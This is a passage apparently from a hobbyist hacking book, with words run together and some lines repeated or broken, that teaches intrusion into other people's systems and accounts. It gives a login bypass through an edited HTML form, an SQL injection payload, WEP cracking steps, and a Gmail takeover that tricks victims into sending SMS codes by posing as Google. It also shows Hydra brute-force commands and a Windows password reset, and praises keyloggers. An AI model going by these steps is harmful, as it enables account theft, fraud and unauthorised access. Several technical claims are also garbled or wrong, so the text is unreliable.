curiosity,nexttypeofhackingiscalledcomputerhackingandithappenswhena

hackeriscontrollingyourmachinewithoutyourpermission.

Network hack attacks are growing since 2003, usually hackers break into a networktodisruptandcausechaos,thefourthtypeisemailhackingandit’s poweredbypeoplecuriosityaboutyou,aboutyouractivitiesandhackersmight sentemailswithyournamepretendingtheyareyou,anothertypeofhackingis theethicalhackingandit’susedwhenabigcompanywantstodiscovertheir securitythreatsonanetwork,systemorevenonacomputer.Andthelasttype, andthemostseriousofallisinternetbankinghack,peoplewhousuallyperform thistypeofhackingaren’trealhackerspoweredbyskills,knowledge,challenges andcuriosity,theyarepoweredbylackofmoneyandthat’swhytheybecome “hackers”,justtogettheirbankaccountsfulltakingbenefitfromothersbank accounts.

WebsiteHacking

Websitesareopendoorstotheworldofinformationandtechnology,billionsof peopleusethemdailytomaketheirlifeeasierandalotofpeopledotheir activity on websites. Website hacking means to take authority from the authorizedperson,whichmeansthatyouarecontrollingthewebsiteandafter

youbreakintothewebsiteyouwillbeabletodosomeactivitiessuchasposting messagestothesite,modifytheinterfaceofthewebsiteandbasicallychange anythingyouwantonthatwebsitebutyouhavetorememberthatitdepends fromwebsitetowebsiteandthatisduetotheirsystemsinuse.Youcanbecome awebsitehackerifyouhaveknowledgeaboutHTMLandJavaScriptata mediumlevelandwithsomeexercisingyoucanbecomearealproinwebsite hackingsbecausetherearealotoflow-securedwebsitesyoucanbreakinto usingHTML. Thisisthekindofsimpleattackyoucanmakebecausewebsites withcomplexsecuritydetailswon’tgiveupinfrontofthismethod,butIhighly recommendstartingwiththiskindofwebsitehackingbecauseit’soneofthe easiestwaysyoucanhackawebsite.

So,ifyouchoosethismethodyoushouldbeforeanythingelseopenthewebsite youwanttohackandenterawrongcombinationofusernameandpassword/ex

username:You,password:1=1or“and‘/,afterthatthewebsitewilldeliverto

youamessagesayingthereisanerrorandtheoperationcan’tbeperformed,get readytohandlethefunnow.Clickrightinanyplaceonthatpagewhichshows youthereisanerrorandthenselectgotoviewsourceoptionandthewebsite willletyouseethesourcecode,thereiswherethemagichappensbecauseyou cantheHTMLcodingwithJavaScriptanditwillappearsomethinglike<_form action=" Login ">butbeforethislogininformationdon’tforgettocopythe URLofthesiteyouwanttohack.Stepfourneedsasmallquantityofattention becauseyouneedtobeverycareful,allthehackoperationdependsonthis,and you should efficiently remove the java script code that is validating your information in the server. After this, you must give a look to <_input name="password"type="password">andputinplaceof<_type=password>this code<_type=text>andcheckoutifmaximumlengthofpasswordissmallerthan

11andifitisincreaseitto11afterdoingthisyoumustgotofile,selectsaveand

saveitwhereyouhavefreememoryonyourharddiskusingtheextension “.html”/ex.:c:\eleven.html/,movetothenextstepbydoubleclickingthefile youjustmadeonyourharddiskrecentlyandthiswillreopenyourtargetwebsite , don’t get scared if you will notify some changes in comparison with the originalpage.Afterdoingtheentirestepspleasemakesureyoumadeitinthe rightwayandenterthetargetwebsiteandprovideanyusernameandpassword. Congrats!Youhavejustcrackedyourtargetwebsiteandbrokeintotheaccount ofListusersavedintheserver'sdatabase.

Thereisanothermethodusedbyhackerstobreakintoawebsiteandit’scalled

InjectionAttack,aninjectionattackistakingplacewhentherearedefectsin your SQLlibraries,SQLDatabase and sometimes it could be the operating system itself. Employees usually open apparent believable files which are containinghiddencommandsandinjections,withoutknowingthis.Thisisthe waytheyletthehackersgetunauthorizedaccesstoprivateinformationjustlike financialdata,creditcardnumbersorsocialsecuritynumbers.Iamgoingto showyouaninjectionattackexamplebelow:InjectionAttackscouldhavethe nextorderlineStringquery=“SELECT*FROMaccountsWHEREcustID='”+ request.getParameter(“id”)+”‘”;tomakethehackingoperationsucceedyou

changethe‘id’indexinyourbrowsertosend‘or‘1’=’1andinthiswayyouwill

returnalltherecordsfromtheaccountsdatabasetoyou.

OfcoursethereareothermethodsyoucanusetohackawebsitesuchasPortal Hacking(DNN)Technique;thismethodalsotakesadvantageinGooglesearch enginetofindeasy-to-hackwebsites.Ifyouchoosethismethodyoushould remember that here you can hack a website only using Google Dorks or attempting to a social engineering attack which happens when you give information to “trustable sources’’ like credit card numbers or via online interactionssuchassocialmediasitesandemailsandthehackishappening whenyougetintowhatyoudon’texpecttogetinto.Anotherwayhackersbreak intoawebsiteisaDDoSattack-ADistributedDenialofServiceattackiswhen youtrytomakeaserviceunavailablebyaccessingitfrommultiplesources generatingabigtraffic,it’sliketakingthewaterfromyouwhenyouareinthe middleofthedesertwhereyouneeditmost.Thehackcouldbetemporallyby makingthewebsiteinaccessibleforashortperiodoftimeoritcouldbeahack thatshutsdownthewholerunningsystem.DDoSattacksaremadebydelivering abignumberofURLrequeststothetargetwebsiteintheshortesttimepossible and this is causing a CPU run out of resources which is the result of bottleneckingattheserverside.Crosssitescriptingattacks,Crosssiterequest forgeryattacksandClickjackingattacksareusedbyhackersusuallytoreach theirgoal.

EthicalHacking

AsImentioned,respectisveryimportantinthevirtualworldbecauseit’soneof thebasicfeaturesforagoodcollaboration.Ifyouaregoingtorespectyourself, yourcustomersandeverythingaroundyouit’simpossibletonotgetsuccess. Serious business organizations and companies respect their jobs and their customersandsecurityisapriorityforthemespeciallyinthevirtualworldand

that’s why they employee ethical hackers, those hackers belong to ethical hackingtypeandtheyarealsoknownaspenetrationtesters.Ethicalhackingis about high standards security systems, hackers are trying to find flaws and weaknessinasystembytryingtohackitandthosehackersarehelpingtheir employers to test and fix their applications, networks and computer system. Ethicalhackersmaingoalistopreventcrackersandblackhathackersgetinto thesystemtheyaretesting.

Byadoptingthiskindofhackingyouarecombiningbusinesswithpleasure becauseyouareexposingyourselftobigchallengesandmorethanthatyouare alsopaidfordoingit,whatcouldbebetter?It’srightthatyouwon’tgetthesame adrenalineportionyougetincaseyouarenotonethicalhackingbuthackingin this way protect you from prison and it’s making you an honest person. However,youneedexperienceinITtogetinanethicalhackerpositionandalot ofworkbehindyoubecauseyoucan’tjustjumpinandbecomeanethicalhacker as many people believe because you will need IT security degrees and certificationsandwithoutexperienceit’simpossibletogetthem.Ifyouwantto startasanethicalhackeryouneedtofollowfewsteps:

First,IhavetoinformyouthatitdependsonthefieldyouarestudyinginITbut youshouldstartwiththebasicsandgetyourA+Certificationandearnatech supportstatusanddon’tforgetthatsomeexperienceisalwayswelcomedsoit’s bettertohaveadditionalcertificationssuchasNetwork+andCCNAandafter yougetthemyoushouldincreaseyourstatusandmoveuptoadminrole.Next, you should invest some time into getting security certifications like TICSA, CISSPand Security+ and progress in your career by takinganinformation securityposition.Afteryou’vegotyourpositionit’srecommendedtofocuson penetrationtestingandexperiencethetooloftrade.Thenextstepisgettinge CertifiedEthicalHacker(CEH)certificationofferedbytheInternationalCouncil ofElectronicCommerceConsultants(EC-Councilforshort)andthelaststep afteryouhavegotalltheaboveisrecommendingyourselfasanethicalhacker. Don’tforgetabouttheprogramminganddatabasessuchasSQL! Youwillalso needgoodcommunicationskills,fastproblemsolvingskillsandastrongwork ethicbecausehackingisn’talltechnicalandyouhavetobepoweredbyyour ownmotivationanddedication.Legalityisanotherimportantaspectweshould takeinconsiderationifwetalkaboutethical hacking because you aren’t legal anymoreifyouattacksomeone’snetworkwithouttheirfullpermission,thereare sometestsyouwillbeunderifyoutakethisjoblikepolygraphtestsandbasic

backgroundtests.It’sonlyonecodefromlegaltoillegalsobeverycareful

becausegettingintoblackhathackingwilltotallydestroyyourethicalhacking

career,stayawayfromillegalactivitiesasmuchasyoucan.

IhavetopickyourattentionagainaboutbecomingaCertifiedEthicalHacker (CEH)becausethiscertificationisveryimportantandhelpfulinthesametime, itwillsetyourmindandmakeitahackermindbyhelpingyouunderstandbetter whatsecurityisabout.Theywillteachyouthemostusedtypesofexploits, vulnerabilities,andcountermeasures.Aftergettingthecertificationyouwillbe abletodooperationslikecrackingwirelessencryption,creatingTrojanhorses, backdoors,viruses,andwormsandyouwillfindouthowtohijackwebservers andwebapplicationsdespitethefactthatyouwillbeaproinpenetrationtesting, socialengineeringandfootprinting.Furthermore,youcantakeonlinetraining andcoursesliveandyoucanworkwithself-studymaterialsbutinadditionThe EC-Council requires a minimum of two years of information-security experience.OneofthemostpopularfiguresinethicalhackingisAnkitFadia,an Indian ethical hacker and he has written over ten books about computer

engineeringandhackingandthefirstonewaswrittenwhenhewasonly15years

,thosebooksarehighlyappreciatedbyprofessionals.Fadiaiscurrentlyworking

asacomputersecurityconsultant.AnotherfamousIndianethicalhackerisRahul

Tyagiwhoisanactorandhackeratthesametime.

Networkhackingisanothercommonusedtypeofhackinganditbasicallymeans assemblinginformationaboutsomethingbyusingtoolsandPortScanning,Port SurfingandOSFingerprintingbyusinganothertools.Toolsusuallyusedin networkhackingarePing,Telnet,NslookUp,Tracert,Netstat,etc.Pingisused torepairTCP/IPnetworksandit’sapartofICMP-InternetControlMessage Protocol,Pingisanorderthatmakesyouabletotestifthehostisdeadornot. To use ping on a particular host syntax is looking like this c :/>ping hostname.comandlet’stakeasanexampleGoogle:c:/>pingwww.google.com andthecommandpromptwillbelikethis:

C:\>pingwww.google.com

Pingingwww.l.google.com[209.85.153.104]with32bytesofdata:

Replyfrom209.85.153.104: bytes=32 time=81ms TTL=248

Replyfrom209.85.153.104: bytes=32 time=81ms TTL=248

Replyfrom209.85.153.104: bytes=32 time=81ms TTL=248

Replyfrom209.85.153.104: bytes=32 time=81ms TTL=248

Pingstatisticsfor209.85.153.104:

Packets:sent=4,received=4,lost=0<0%loss>,

Approximateroundtripstimesinmilli-seconds:

Minimum=81ms,Maximum=84ms,Average=82ms

NetstatshowsyoucurrentTCP/IPnetworkconnectionsandprotocolstatistics.It can be used with the syntax at command prompt : c:/>Netstat-n and the commandpromptwilldisplay:

C:\>Netstat-n

Activeconnections:

ProtoLocaladdress ForeignaccessState

TCP117.200.160.151:2170209.85.153.104:80 Established

TCP117.200.160.151:2172209.85.153.104:80 Time_Wait

TCP117.200.160.151:2174209.85.153.104:80Established

TCP117.200.160.151:2176209.85.153.104:80Established

TCP127.0.0.1:1042127.0.0.1:1043 Established

TelnetisanothertoolwhichrunsonTCP/IP.Itisusedtoconnecttotheremote computerorparticularport.Itsbasicsyntaxis:c:/>telnethostname.comandthe complete syntax when it connects to port 23 of the computer is: c:/>telnet hostname.comport.

Example:c:/>telnet192.168.0.521orc:/>telnetwww.yahoo.com21

Tracertisanothertoolusedbynetworkhackersanditstracingouttheroute takenbytheinformation.Tracertsyntax:c:/>tracertwww.hostname.com let’s takeasexamplewww.insecure.in:

C:/>tracertwww.insecure.in

Commandpromptwilldisplay:

C:\>tracertwww.insecure.in

Tracingroutetoinsecure.in [174.133.223.2]

Overamaximumof30hops:

1 29ms30ms29ms 117.200.160.1

2 31ms29ms29ms 218.248.174.6

3***Requesttimedout

4694ms 666ms 657ms125.16.156.17

5644ms 656ms 680ms125.21.167.70

6702ms 686ms 658msp4-1-0-1.r03.lsanca03.us.bb.gin.ntt.net

7682ms 710ms703msxe-3-3-0.r21.lsanca03.us.bb.gin.ntt.net

8676ms692ms707msas-0.r21.hstntx01.us.bb.gin.nnt.net

9748ms837ms828msxe-4-3.r03.hstntx01.us.bb.gin.nnt.net

10717ms721ms722msxe-4-4.r03.hstntx01.us.ce.hin.nnt.net

11695ms701ms712ms po2.car07.hstntx2.theplanet.com

12726ms697ms688ms2.df.85ae.static.theplanet.com

Tracecomplete.

NetworkHacking

Despitethehackers,thereare“occasional”hackerswhoareusingthenetwork hackingtocrackwirelesspasswordsbecauseinternetconnectionsareanecessity inourlivesbuthowisawirelessnetworksecured?Incaseofsecuredwireless connections,encryptedpacketsrepresentinternetdataunderanotherform. Packetsareencryptedwithnetworksecuritykeysandbasicallyifyouwantto haveaccesstointernetwirelessconnectionthenyoushouldhavethesecurity keyforthatparticularwirelessconnection. Therearetwotypesofencryptions inuseWEP(WiredEquivalentPrivacy)andWPA(Wi-FiProtectedAccess), WEPisthefundamentalencryptionandaverysmallnumberofpeopleuseit becauseit’sveryunsafeanditcanbecrackedveryeasy.WPAisthemoresecure

option,WPA-2isthemostsecureencryptionofalltimeandyoucancrackaWi-

Fi Protected Access network then you will need a wordlist with common

passwordsbutitcanbeunbreakableiftheadministratorisusingacomplex

passwordandbecausealotofpeopleareinterestedinbreakingWi-Fiprotected

connections,thisbookisgoingtoshowyouhowtodoit.Youwillneeda

compatiblewirelessadapter,CommViewforWi-Fi,Aircrack-ngGUIandabig

bagfullofpatience.Thisoperationisimpossiblewithoutacompatiblewireless

adapter,yourwirelesscardmustbecompatiblewiththesoftwareCommView,

softwareusedforcapturingthepacketsfromthenetworkadapter,andyoucan

downloadthesoftwarefromtheirwebsite.Aircrack-ngGUIispracticallydoing

thecrackaftercapturingthepackets.

Don’tforgettwomainthingsbeforestarting:selectthenetworkwiththehighest

signalandrememberthateverynetworkhasitsdetailsintherightcolumn,notin

theleftcolumn.SetupCommViewandchooseyourtargetnetwork,selectitand

doubleclickon“capture”withCommViewandthesoftwarewillstartcollecting

packetsfromtheselectedchannel.Ifyouwanttocapturepacketsonlyfromthe

targetnetworkthenrightclickonthetargetnetworkandcopytheMACaddress,

onthetopchangetoRulestab,ontheleftpickMACaddressesandenablethem.

Onceyouhavedonethis,selecttheoptioncaptureandfor‘addrecord’please

selectbothandpastethecopiedaddressesinthedisplayedbox.Enableauto

to2000and

to20.Andyouareatthepointwhereyoushould

useyourpatienceandwaituntilatleast100,000packetsarecapturedandexport

thembygoinginthelogtabandselectingconcatenatelogsandselecteverything

thathasbeensavedanddon’tforgettokeepCommViewopen,takeawalktothe

savingintheloggingtab,setMDS(

MaximumDirectorySize)

savingintheloggingtab,setMDS( MaximumDirectorySize) ALFS(AverageLogFileSize)

ALFS(AverageLogFileSize)

folderwhereyouhavesavedtheconcatenatedlogsandopenitandclickonFile-

Export-Wiresharktcpdumpformatandchoseanydestination,afterdoingthis

logswillbesavedwith.capextension.

 

Next,openAircrack-ngandthereyouwillfindazipfile,extractitandopenit

andnavigateto‘bin’,nowrunthesoftwareandchooseWEP.Rememberthefile

yousavedearlier.cap?Click‘launch’andinthecommandpromptwritethe

parameternumberofyourdesirednetworkandwaitforafewseconds.Enjoythe

internetnow!

EmailHacking

Thefourthtypeofhackingisemailhackingandinthistypehackersattemptto

anemailaddresswithoutpermission.Theelectronicmailismoreusedthanthe

traditionalmailboxesandthat’sduetotheevolution,emailsareusedtoday

mostlyasaformofcommunicationduetoitsoptions.Therearetwotypesof

servicesweb-based:anemailservicewhichisopen-basedandthatmeansthis

typedeliveremailaccountstoanycustomer,someofthemareforfreebutsome

requestfeesandtheothertypegiveemailaccountscontrolledandorganizedby

companiesforemployees,andingeneralstudentsandmembersonly.Thereare

threebigformsofattacks:spam,virusorphishing.

contains a hidden IP address or email addresses, a spam message usually containssomethingveryattractivesuchaslow-pricedtraveltickets,joboffers andingeneralanykindofoffersandtobemoreattractivespammersusealotof colorsandphotos.Someofthehackvictimsmayopenthemagicmessage,read itandgetreallyinterestedinitscontent.

Thebigfunforhackersiswhentheyhitabigcompanyandholdtheirsending

emailandIPaddress.Ifthemastersofemailhackingchooseacompanyand

hackitthecompanywouldbedestroyedandtheirinternetconnectionwouldbe

downandstoppedbyitsInternetServiceProvider(ISP)andnoneoftheiremails

wouldreachthedestinations.

Another method used by hackers to get unauthorized access into someone’s emailisbysendingthemanemailthathidesavirusinthebackground,theSobig virusisoftenusedbecauseit’samoderntechnologythatcreatesaspamming infrastructurebecauseit’stakingoverunwillingPCmembers.Thethirdway hackersfollowtohackandemailiscalledphishinganditconsistofcollecting sensible and valuable information from others emails such as credit card numbers,usernamesandpasswordsandmanyhackersusethismethodtoget money. The risk of being hacked by phishing is very high in those days especiallyonFacebookandTwitterwhereyougivesomepreciousinformation aboutyourperson,socialmediaisnotaskindasitseemsandtherearealotof wellhiddensecretsbehindthem.

Therearethreetypesofphishing,thefirsttypeisknownasSpearPhishingand

it’susedtoattacktargetpeople,companiesandorganizations,91%ofemail

attacksaremadewiththiskindofphishingandmostofthemaresuccessful.The next phishing type is called Clone Phishing and its adepts clone emails by creatingidenticalonesandthelasttypeofphishingisknownasWhaling,people usethistermtodescribeahighprofileattackmadeusingphishingmethod.

Aninterestingwaytohacksomeone’saccountyoucanapplyonlybyknowing

his/herphonenumber,letmeexplainhow,whenapersonismakinganewemail

addressitsrecommendedtoattachtheirphonenumberforsecurityreasonsand

incaseyouforgetyouremailpasswordyoucansetanewoneifyouaddyour

phonenumber,somostofthepeopleaddtheirphonenumbers.It’senoughto

knowyourvictim’sphonenumberandemailaddresstostart.

First,gototheloginpageandtypetheemailwheretheyaskyoutodoitand

afterthatselectthe‘’needhelp?’’optionandselect

"Getaverificationcodeon

my phone: [mobile phone number]" and the sms will be sent to the phone

my phone: [mobile phone number]" and the sms will be sent to the phone number,thesmsusuallyisformedfromsixletters.Afterthat,youshouldsenda messagetotheperson’snumberpretendingyouareGoogleandthemessage shouldbe"Googlehasdetectedunusualactivityonyouraccount.Pleaserespond withthecodesenttoyourmobiledevicetostopunauthorizedactivity.”the victimwillbelievethismessageandsendyoutheverificationcodewhichyou willenterlately.Afterenteringthecodesetupanewpasswordandwearedone,

checkeverythingyouwantonthataccount.

willenterlately.Afterenteringthecodesetupanewpasswordandwearedone, checkeverythingyouwantonthataccount.

*Note:thismethodworksonlywithGmailaccountsanditwillbesuccessfulif

thevictimdoesn’tknowyournumber,incasethenumberisknownbythevictim

trytosendthemessagefromanunknownnumber.

Everyoneofusmusttakemeasuresimmediatelytoprotectouremailaddresses, a big company like Yahoo!, Gmail or Hotmail treat their customers with curiosity by offering them high security, each one of them will notify you immediatelyifthereissomethingstrangeandaskyoutocheckyouremailorset upyourpassword.

Anothergoodideaistomakeacomplicatedemailaddresswithnumbersbut makesureyoudon’tforgetit!Alsoyoushouldchooseacomplexpasswordwith numbersandbigandsmallletters(Irecommendcreatingapasswordwithmore

than12characters).Yourcomputershouldbeprotectedaswell,makesureyou

getaprofessional,originalandhighqualityantivirussoftwarelikeAviraor

Avast,theymightofferyouashorttestingperiodandafterthattheywillaskyou

tobuyit,doit,ittotallyworth!Evenahackershouldprotecthiscomputer

becauseyouneverknowwhatcouldhappeninthenextsecond.

Choosingadifficultsecurityquestionwillincreaseyoursecurityratebutbe

careful;youshouldremembertheanswerevenaftertenyearsormoreifit’s

needed,thisoptioncouldsaveyouremail’slifebecausenoonewillbeableto

surftheinternetinhopetofindsomethingverypersonalaboutyou.

However,emailhackershavealotofsuccessthosedaysbysimplygettinginto

moreandmoreemailaccounts….

PasswordHacking

Anothertypeofhackingispasswordhackingandsomeofthepeoplealsocallit passwordcracking,thehuntedpeopleareusuallycelebrities,governmentpeople or ‘’too loved’’ persons or they could be simple persons who forgot their

passwords and want them back so they recover them by hacking their own accounts.Apasswordhackerisusingallhisintellectualandpracticalpowerto solvetheproblemandnotbyguessingthepasswordbecausethisissomething thatanunspecializedpersonwoulddo,notamasterofhacking.Sodoyouthink yourpasswordissecure?Thinkagainaboutthis.

So,passwordhackingisamethodtorecoveryourownpasswordfromdata transmitted by or stored on a computer, or you it can be a method to get someone’selsepasswordwithoutaskingforit.Infact,passwordhackingis about you passwords and other’s passwords that protect their important or valuabledata.

Therearesomefamoustechniquestohackapasswordsuchasdictionaryattack, brute force attack, rainbow table attack, phishing is used also here, social engineering,malware,offlinehacking,spideringandshouldersurfing.Because ofthespideringmethodhackersgaveasmallpieceoftheirtimetostudywebsite sales material and even the websites of competitors and corporate literature becausetheyreleasedthatpasswordsarecombinationsofwordslinkedtothose domainssotheygotinspiredandcreatedapersonalizedwordlisttoletthemget accesstothesecuredinformationeasier.Theotherhackerswhodon’thavetoo muchtimetospendreading,thereisanapplicationthatcandothatreplacing yourwork.Dictionaryattacksarebasedonmostusedwordsaspasswordsand thismethodisusingsimplefileswhichcontainwordsthatcanbefoundina dictionary.

IfyouaregoingtohackbyrainbowtableattackyouwillneedalotofRAM becausethefileisaboutfourGigabytes(GB),arainbowtableisapre-calculated listofhashesandisworkingbylistingpermutationsofencryptedpasswords specifictoagivenhashalgorithm.Thismethodisoneofthefastestmethodsof hacking because in average is only 160 seconds to break a 14-character alphanumericpassword,butdon’tforgetthatabigpartoftheprocessdepends onthesoftware.Asinemailhacking,phishingisusedinpasswordhackingas wellbecauseit’soneoftheeasiestwaystohackbysendinganemailunder differentinstitution’sidentitiesaskingthemtogiveyoutheirpassword,andyou havebigchancestowinifyouaregoingtochoosethismethodofhacking.Even morethanthat,thereisasocialengineeringwhichistakingtheaboveconcept outsidetheinbox,youwouldbereallysurprisedhowmuchthisworkstheonly thingyouhavetodoistoposeasanITsecurityagentandsimplyaskforthe passwordsunderafakeidentityofcourse,someofthehackersdothisfaceto

facemakingafalseidentitydocumentbefore.

Bruteforceattacksarealsoknownasexhaustivekeysearchandtheyareattacks

againstencrypteddatabutanexceptionisdataencryptedinaninformation-

theoreticallysecuremanner,thismethodissimilartodictionaryattackmethod andit’snotaquickwaytohackapassword,it’sagreatmethodtohackshort passwordseveniftheyhavegotnumbersinthembuttherearesomeencryptions thatcouldnotbegivenupbybruteforceduetotheirmathematicalproprieties andcomplicatedalgorithms.YoucanusesoftwaresuchasHashcat,Johnthe Ripper, Aircrack-ng, Cain and Abel, Crack, SAMInside, Rainbowcrack,

L0phtcrack,Hashcodecracker,DaveGrohlandOphcracktohackpasswords

withthismethod.

AndhereisanexampleusingHydra:

root@find:~/Desktop#hydra-t10-V-f-lroot-x4:6:aftp://192.168.67.132

Malwareissuchagreatandenjoyablemethodtohackpasswordsbecauseit’s not taking a bi amount of effort, malware can install key loggers or screen scrappersthatcollectseverythingyouwriteandifyouwanttoitcanmakeprint screenswhileapersonislogginginandthensendsbyforwardingacopyofthe

filetoyou.Arecentresearchisshowingthatover45,000Facebookaccounts

havebeenhackedusingmalware.Malwareisgreatbecausedespitethefactthat ishelpingyou hackapassword itcandisruptcomputeroperationsand win accesstoprivatecomputersystems.Malwareisthecontractionformalicious software.

ShoulderSurfingitisthemostusedmethodtocollectpasscodesfromATM

machinesandcreditcardsanditisrealizedrunningyoureyesoveraperson’s

shouldertovisuallycollectwhatthatpersonistyping.

Offline hacking is also a nice method to hack passwords used by hackers, hackerscantakefulladvantageofthismethodbecausetheycandoitinareally quicktime,byusingthismethodyouwillbeabletotakethepasswordhashes out of the local SAM file and hack the selected hashes using methods like DictionaryorRainbowtablebuttobecapableofdoingthisoperationyoushould download and install Cain and Abel software. This kind of attack is only possiblewhenyouhavethepasswordhashesanditswaymorewellthanonline attacksduetothemaindifferencebetweenthemwhichisthespeedyoucanhack apassword.

JusttogetsometrainingIrecommendtryingbothonlineandofflineattacks

becausetheyareverydifferentandifyouaredoingitforthefirsttimeitcould

beoneofyourlifechallenges.Sometimesyouwon’tgettheresultyouwantto

onlytryingonce,butnevergiveupandthinkaboutthebestsolutions!Makesure

youhaveallthecomfortconditionsyouneedwhenyoudosuchoperations

becausetheyneedalotofpatienceandattention.

Let’smakeanimaginationexerciseandbelieveforamomentthattherearen’t

anypasswordstobreakandeverythingisfree,wouldn’titbetooboring?

Thoseskillswillhelpyoureachyourgoalsanditisfuntotryeachoneofthem.

Butifyouwantsomethingmoreprofessionaltohackapassword,thenthisbook

istherightoneforyoubecausebelowyouwillfinouthowtohackapassword

usingTHC-HydrabutyouwillneedtodownloadandrunKalidistributionin

ordertogetthistoolinstalled.

The first step in hacking passwords using THC-Hydra is downloading and installinganothertoolwhichisanextensionofFirefoxanditgivesyouthe capabilitytokeepand/orchangetheoutgoingHTTPrequestsanditiscalled “TamperData“,itwasoneofthebesthiddensecretsofthehackers…until now,thistooliseasytousebecauseitiswellbuiltanditallowsyoutopost informationtoo.AfteryoudownloaditpleaseinstallitintoIceweaselwhichisa browserinKali.

Onceyoudotheabovecarefully,pleasemovetothenextstepbytestingTamper Data by activating the tool into your browser and start surfing the internet randomly.TamperDatamustprovideyouwitheachHTTPSGETandPOST requestbetweenyourbrowserandtheserver,ifthetoolisdoingthisthenyou cansuccessfullyfollowthenextstep.

ThenextstepconsistsinopeningTHCHydraafteryouinstalledandtested

TamperData,youcanopenHydrabyaccessingKaliLinux,selectingtheoption

passwordandthecomputerwilldisplayOnlineAttacksoption,clickonitand

selectHydra.

OnceyouopenHydra,youcannoticeHydra’ssyntaxroot@kali:~#,Hydrawill

welcomewithahelpscreenwhichlookslike:

OPTsomeservicemodulessupportadditionalinput(-Uformodulehelp)

Supportedservices:asteriskafpciscocisco-enablecvsfirebirdftpftpshttp[s

]-{head|get}http[s]-{get|post}-fromhttp-proxy-urlenumicqimap[s]irc

ldap2[s] ldap3[-{cram|digest}md5][s]mssqlncpnntporacle-listenerora

cle-sidpcanywherepcnfspop3[s]postgresrpdrexecrloginrshs7-300sipsmb

smpt[s]smtp-enumsnmpsocks5sshsshkeysvnteamspeaktelnet[s]vmauthd

vncxmpp

Hydraisatooltoguess/crackvalidlogin/passwordpairs–usageonlyallowed

forlegalpurpose.ThistoolislicensedunderAGPLv3.0.

Thenewestversionisalwaysavailableathttp://www.thc.org/thc-hydra

Theseserviceswerenotcompiledin:sapr3oracle.

Use HYDRA_PROXY or HYDRA_PROXY – HYDRA_PROXY_AUTH–environmentforaproxysetup.

E.g.: %export HYDRA_PROXY=socks5://127.0.01: 19150 or (socks4:// or connect://)

needed

and

if

%exportHYDRA_PROXYHTTP=http://proxy:8080

%exportHYDRA_PROXY_AUTH=user:pass

In Hydra, the username can be “user” or “admin” or maybe “person”, the usernameisasinglewordusuallyandpasswordlistisafilethatit’scontaining possiblepasswordsandtargetindicatestheIPaddressandport.

And the last step is using Hydra to hack passwords like in the following example:

root@kali:/usr/share/wordlists#hydra–l admin -p /usr/share/wordlists/rockyou.txt 192.168.89.19080

AboveIjusthackedthe‘admin’passwordusingthewordlist“rockyou.txt”at 192.168.89.190 port80.

TakefulladvantageofusingHydraanduseitonWebFormstoo,Hydra’ssyntax

usingawebformis

<url>:<formparameters>:<failurestring>andTamperData

willhelpyoubyprovidingimportantinformation.

 

*Note:UsefulHydradictionary:

-t=howmanyparallelattemptatamoment(1/5/10/100?)

-P=dictionaryfile

-f=stopwhenfoundthepassword

-v=showoutput

-I=username

There are other famous tools used for password hacking except the one mentioned,toolssuchasMedusa,WfuzzandBrutus.Brutusisoneofthemost usedtoolsforpasswordhackingbecauserecentstudiesareshowingthatit’sthe mostflexibleandthefastesttoolusedinthistypeofhacking,onlyworkson

WindowssystemanditisonmarketsinceOctober,2000anditistotallyfree.

MedusaissimilartoHydraandit’ssupporting

HTTP,FTP,CVS,AFP,IMAP,

MSSQL,MYSQL,NNTP,NCP,POP3,PostgreSQL,pcAnywhere,rlogin,rsh,

SMB, SMTP, SNMP, SSH, SVN and VNC. This tool is capable to check

approximately2000passwordsperminuteifthenetworkconnectivityisgood,

butbeforeyoustartusingittakeacloselooktothecommandsbecausethisisa

commandlinetoolandtrytolearnthem.

Wfuzzisalsoatoolusedbypasswordhackerswithbruteforce,youcanuseitto

discoverhiddensourcessuchasscriptsandservlets.Wfuzzisalittlebitdifferent

becauseithasthecapabilitytoidentifyinjectionslikeSQLInjection,LDAP

InjectionandXSSInjection.WhytochooseWfuzz?It’ssimple,youshould

chooseitforthosereasons:

ItcanbruteforceHTTPpassword,ithasmultipleproxysupport,itcaninjectvia

multiplepointsandpostheadersandauthenticationdatausingbruteforce.

Eachofthementionedtoolsaregreatandhelpfulinpasswordhacking,areal

hackermusttrythemallandthenchooseafavoritetooltouseinhisnext

passwordhackingattacksbecauseeverytoolisspecialinadifferentwayand

eveniftheyseemtodothesamethings,ifyougivesometimetotryandanalyze

eachofthemyouwillseethattheyaredifferentfromeachotherevenifthemain

ideaispracticallythesame,theywereallcreatedtodothesamething:tohelp

hackersdotheirjobbetter.

oftime,yougainexperienceandyouexerciseyourbrainatthehighestlevelsby trying every new feature and exploring it, by making new connections and creatingnewsolutions.

Also,ahackerknowsmostlyeverythingaboutallthetypesofhackingsohe

preferqualityoverquantityandisalwaysinvestinginnewhighstaplesoftware

thathecan’twaittoexplore,findthesoftwareweaknessandmakeiteven

higherqualitythanbeforebecauseevolutionisinfinite.

ComputerHacking

ThepenultimatetypeofhackingisrepresentedbyComputerhackingwhichisa

typeofhackingusedbyhackerstogetaccesstoanotherperson’scomputerand

controlitwithouttheownerpermissionandtherearefewoperationsperformed

onthehackedcomputerlikecollectingmaterialorusingittochatandeven

accesssomesensitivefilesonthatcomputer.

Computerhackingisaboutchangingthehardwareandsoftwareonthehacked computer,reportsshowthatmostofthecomputerhackersareteenagersandvery youngadultsbutthereareaswelloldagedhackers,asanyotherhackingtype, computer hacking is considered by hackers a form of art and it not an opportunitytobotherothersasmanypeoplesee,infact,computerhackingisa chanceforhackerstoprovetheirabilitiesandskills.

Therearefamouscomputerhackersandweshouldthankthemeverydayfor

 

theirrealizationsbecauseiftheyweren’tmaybethetechnologynowadayswon’t

beatthispoint,

 

DennisRitchieandKenThompsonworkedearlyinthe70’sto

createtheUNIXoperatingwhichhighlyaffectedthedevelopmentofLinuxand they were tagged as former hackers. Another important computer hacker is ShawnFanningwhocreatedNapster.

TherearethreemethodstohackacomputerandthefirstoneiscalledHacking

Logins,thesecondoneRemotehacksandthethirdoneisabouthackingWi-Fi.

Therearefewstepstofollowineverycase.

Wearegoingtostartwiththefirstmethodofcomputerhacking,sothefirststep istoopenyourcomputerandbootitinthesafemodeandafterdoingthiswaita coupleofsecondsuntilthecomputerisopen,whenit’sopeninthesafemode pleaseclickonStartbuttonandselect“run”afterthattrytowritein“control userpasswords2” and change passwords for any other account if there are multipleaccountsandattheendoftheprocessdon’tforgettorestartthefresh

hackedcomputer.

